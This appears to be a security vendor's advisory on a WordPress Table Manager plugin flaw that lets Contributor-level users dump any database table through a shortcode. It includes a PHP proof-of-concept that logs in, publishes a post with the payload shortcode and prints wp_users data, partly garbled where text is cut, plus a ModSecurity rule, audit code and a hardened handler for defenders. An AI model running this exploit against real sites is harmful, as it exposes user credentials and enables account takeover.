Atomic Edge analysis of CVE-2026-4126 (metadata-based)

This vulnerability in the Table Manager plugin (prefix. The code then runs DESC and SELECT * queries on this arbitrary table name, rendering all results to the frontend. The plugin maintains a list of allowed tables in the 'tablemanager_created_tables' option, but this option is only checked in admin functions, never in the shortcode handler. Atomic Edge research confirms this is the root cause based on the explicit description of the vulnerability, though no source code was available for verification.

Exploitation: An attacker with Contributor-level access or higher creates a post or page containing the shortcode [table_manager table="{target_table}"], where {target_table} is the name of a WordPress core or plugin table (without the prefix). For example, [table_manager table="users"] would query wp_users and display all user data, including hashed passwords. Any authenticated user with the 'edit_posts' capability can inject this shortcode into content. The shortcode is processed during page rendering, causing the plugin to execute DESC wp_users and SELECT * FROM wp_users and to output the entire contents into the frontend HTML. The attacker simply visits the page containing the malicious shortcode to see the exposed data.

Remediation: The fix requires adding an allowlist check in the shortcode handler. Before executing any query, the plugin must retrieve the 'tablemanager_created_tables' option and verify that the user-supplied table name (after prepending the prefix) exists in that list. Alternatively, the plugin could join with the options table to validate. The fix should also include a capability check (though Contributor+ is a reasonable baseline) and should not expose raw database results to unauthenticated users. Patching requires updating the tablemanager_render_table_shortcode() function to reject any table not in the plugin's registry.

Impact: Successful exploitation exposes sensitive data from any WordPress database table. This includes user credentials (hashed passwords from wp_users), session tokens, API keys stored in wp_options, post content including private/draft posts, and any plugin-specific sensitive data. While the CVSS score is 4.3 (Medium) due to the Contributor+ requirement and a low confidentiality impact assessment, the actual risk is higher, as the exposed password hashes may be cracked offline, leading to privilege escalation.

Proof of concept (poc_php, metadata-based)

```php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-4126 – Table Manager true,
 CURLOPT_POSTFIELDS => http_build_query([
 'log' => $username,
 'pwd' => $password,
 'wp-submit' => 'Log In',
 'redirect_to' => $target_url . '/wp-admin/',
 'testcookie' => 1
 ]),
 CURLOPT_RETURNTRANSFER => true,
 CURLOPT_COOKIEJAR => '/tmp/cve-2026-4126-cookies.txt',
 CURLOPT_FOLLOWLOCATION => false,
 CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Get wp-admin page to extract nonce for post creation
$admin_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init($admin_url);
curl_setopt_array($ch, [
 CURLOPT_RETURNTRANSFER => true,
 CURLOPT_COOKIEFILE => '/tmp/cve-2026-4126-cookies.txt',
 CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
curl_close($ch);

// Extract nonce from response
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Create a new post with the malicious shortcode
// The shortcode [table_manager table="users"] will render wp_users table contents
$post_data = [
 'post_title' => 'Table Exposure PoC',
 'post_content' => '[table_manager table="users"]',
 'post_status' => 'publish',
 'post_type' => 'post',
 '_wpnonce' => $nonce,
 'action' => 'editpost'
];

$post_url = $target_url . '/wp-admin/post.php';
$ch = curl_init($post_url);
curl_setopt_array($ch, [
 CURLOPT_POST => true,
 CURLOPT_POSTFIELDS => http_build_query($post_data),
 CURLOPT_RETURNTRANSFER => true,
 CURLOPT_COOKIEFILE => '/tmp/cve-2026-4126-cookies.txt',
 CURLOPT_FOLLOWLOCATION => true,
 CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
$post_id = 0;
if (preg_match('/post=([0-9]+)/', curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), $m)) {
 $post_id = (int)$m[1];
}
curl_close($ch);

// Step 4: Retrieve the published post to see the exposed data
if ($post_id) {
 $view_url = $target_url . '/?p=' . $post_id;
 $ch = curl_init($view_url);
 curl_setopt_array($ch, [
 CURLOPT_RETURNTRANSFER => true,
 CURLOPT_COOKIEFILE => '/tmp/cve-2026-4126-cookies.txt'
 ]);
 $content = curl_exec($ch);
 curl_close($ch);

 // Extract and display the table data (user credentials exposed)
 // The plugin renders DESC first, then SELECT * – look for table output
 echo "Exploited! Exposed data:\n";
 if (preg_match_all('/
```

ModSecurity rule

```apache
# Atomic Edge WAF Rule – CVE-2026-4126 (metadata-based)
# This rule blocks the Table Manager shortcode exploitation by detecting the 'table' parameter
# in post content that attempts to access non-plugin tables (like 'users', 'options', etc.)

SecRule REQUEST_URI "@contains /wp-admin/post.php" \
 "id:20264126,phase:2,deny,status:403,chain,msg:'CVE-2026-4126 Table Manager malicious shortcode table parameter',severity:'CRITICAL',tag:'CVE-2026-4126'"
 SecRule ARGS_POST:post_content "@rx \[table_manager\s+table=[\"\']?(?!.*(?:tablemanager_))[a-z0-9_]+[\"\']?\]" "chain"
 SecRule ARGS_POST:post_status "@streq publish" "t:none"
```

Note that this rule only inspects classic-editor submissions to /wp-admin/post.php and only when post_status is publish; the block editor saves posts through the REST API (/wp-json/wp/v2/...), and the shortcode is just as dangerous in a draft that is previewed, so the rule is a stop-gap rather than a replacement for patching, and its negative lookahead assumes the plugin's own tables carry a 'tablemanager_' prefix.
Frequently Asked Questions
What is CVE-2026-4126?
Overview of the vulnerability
CVE-2026-4126 is a vulnerability in the Table Manager plugin for WordPress that allows authenticated users with Contributor-level access or higher to expose sensitive information from arbitrary database tables. This occurs through the use of a user-controlled 'table' attribute in the 'table_manager' shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises because the 'table_manager' shortcode does not properly validate the 'table' attribute provided by users. It only sanitizes the input with sanitize_key(), which lowercases the value and strips everything except letters, digits, dashes and underscores, and then directly queries the database using this input. That sanitization prevents SQL injection through special characters, but it does nothing to restrict which table is named, so attackers can read sensitive data from any table in the WordPress database.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Table Manager plugin version 1.0.0 or earlier is affected. Specifically, users with Contributor-level access and above can exploit this vulnerability by embedding the malicious shortcode in posts or pages.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify whether you are using the Table Manager plugin version 1.0.0 or earlier. Additionally, review your posts and pages (including drafts and pending posts) for any occurrences of the 'table_manager' shortcode whose 'table' attribute names a table the plugin did not create, for example 'users' or 'options'.
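The review described above, as an added audit routine that is not part of the Table Manager plugin: it walks every post and page, extracts each [table_manager] shortcode and reports those whose 'table' attribute is not in the plugin's 'tablemanager_created_tables' allowlist. It assumes that option holds an array of full table names (prefix included), which the page describes but does not show.

```php
<?php
// Added example (not the plugin's own code): audit existing content for
// [table_manager] shortcodes that point at tables the plugin did not create.
// Assumption: 'tablemanager_created_tables' is an array of full table names
// such as 'wp_tablemanager_prices' (prefix included).

function tablemanager_audit_shortcode_usage() {
    global $wpdb;

    $allowed  = get_option( 'tablemanager_created_tables', array() );
    $allowed  = is_array( $allowed ) ? $allowed : array();
    $findings = array();

    // Every post type and status: Contributors can only create drafts and
    // pending posts, so restricting the audit to published content misses them.
    $query = new WP_Query( array(
        'post_type'      => 'any',
        'post_status'    => 'any',
        'posts_per_page' => -1,
        's'              => '[table_manager',
    ) );

    foreach ( $query->posts as $post ) {
        if ( ! preg_match_all( '/\[table_manager\b([^\]]*)\]/i', $post->post_content, $m ) ) {
            continue;
        }
        foreach ( $m[1] as $attr_string ) {
            // shortcode_parse_atts() handles quoted and unquoted attribute values.
            $atts  = shortcode_parse_atts( trim( $attr_string ) );
            $table = ( is_array( $atts ) && isset( $atts['table'] ) ) ? sanitize_key( $atts['table'] ) : '';

            // Same name construction the plugin uses: prefix + sanitized key.
            if ( '' !== $table && in_array( $wpdb->prefix . $table, $allowed, true ) ) {
                continue; // legitimate plugin table
            }
            $findings[] = array(
                'post_id' => $post->ID,
                'author'  => (int) $post->post_author,
                'status'  => $post->post_status,
                'table'   => $table,
            );
        }
    }
    return $findings;
}
```

Each finding carries the author ID and post status, which is what an incident responder needs to decide whether the shortcode was planted by a low-privilege account and whether the post was ever publicly rendered.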
What are the potential risks of this vulnerability?
Understanding the impact
The potential risks include exposure of sensitive data such as user credentials, session tokens, and private post content. Although the CVSS score is 4.3, indicating a medium severity, the actual risk is significant due to the possibility of exposing hashed passwords that can be cracked offline.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Table Manager plugin to the latest version that addresses this issue. Additionally, you can implement an allowlist check for the 'table' attribute in the shortcode handler to ensure only authorized tables are accessed.
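The allowlist check recommended above, written out as an added example of a hardened shortcode handler; this is not the plugin's own code or its actual patch. It assumes the plugin stores its created tables in 'tablemanager_created_tables' as an array of full table names and builds the queried name as $wpdb->prefix plus the sanitized attribute, as the analysis on this page describes.

```php
<?php
// Added example (not the Table Manager plugin's code): the shortcode handler
// with the missing allowlist check in front of the query.
// Assumption: 'tablemanager_created_tables' is an array of full table names
// (prefix included); the function name mirrors the one the analysis cites.

function tablemanager_render_table_shortcode_hardened( $atts ) {
    global $wpdb;

    $atts  = shortcode_atts( array( 'table' => '' ), $atts, 'table_manager' );
    $table = sanitize_key( $atts['table'] );
    if ( '' === $table ) {
        return '';
    }

    // Same name construction as the vulnerable path: prefix + sanitized key.
    $full_name = $wpdb->prefix . $table;

    // The missing check: only tables the plugin itself created may be rendered.
    // wp_users, wp_options, wp_usermeta and other core tables are never listed.
    $allowed = get_option( 'tablemanager_created_tables', array() );
    if ( ! is_array( $allowed ) || ! in_array( $full_name, $allowed, true ) ) {
        return '';
    }

    // Identifiers cannot be bound as prepared values; the exact-match allowlist
    // above is the real control. Backtick-quote anyway so a dash left by
    // sanitize_key() cannot break the statement.
    $ident = '`' . str_replace( '`', '``', $full_name ) . '`';
    $rows  = $wpdb->get_results( "SELECT * FROM {$ident}", ARRAY_A );
    if ( empty( $rows ) ) {
        return '';
    }

    // Escape every cell on output so stored content cannot inject markup.
    $html = '<table><thead><tr>';
    foreach ( array_keys( $rows[0] ) as $col ) {
        $html .= '<th>' . esc_html( $col ) . '</th>';
    }
    $html .= '</tr></thead><tbody>';
    foreach ( $rows as $row ) {
        $html .= '<tr>';
        foreach ( $row as $cell ) {
            $html .= '<td>' . esc_html( (string) $cell ) . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</tbody></table>';
}
```

Registering this function with add_shortcode( 'table_manager', ... ) in place of the original handler applies the check at render time, which is where the page says the original check was absent.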
What should I do if I cannot update the plugin immediately?
Temporary measures
If you cannot update the plugin immediately, consider disabling the Table Manager plugin to prevent exploitation. You may also restrict access to the WordPress admin area to limit who can create posts with the vulnerable shortcode.
What does the CVSS score of 4.3 indicate?
Understanding severity ratings
The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, the potential impact on confidentiality can be significant due to the exposure of sensitive data.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can create a post containing the shortcode [table_manager table='users'], which would execute a SELECT query on the wp_users table. This allows the attacker to retrieve and display sensitive user data on the frontend.
How can I implement a security rule to block this vulnerability?
Using ModSecurity
You can implement a ModSecurity rule to block exploitation attempts by detecting the 'table' parameter in post content. The rule should deny requests that attempt to access non-plugin tables and can be configured to return a 403 Forbidden status.
What is the role of the 'tablemanager_created_tables' option?
Functionality and importance
The 'tablemanager_created_tables' option is intended to maintain a list of tables that the Table Manager plugin is allowed to access. However, this option is only checked in admin functions and not in the shortcode handler, which is the root cause of the vulnerability.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website and the internet. Our AI inspection and analysis engine automatically blocks threats before traditional firewall services can inspect, research and build archaic regex filters.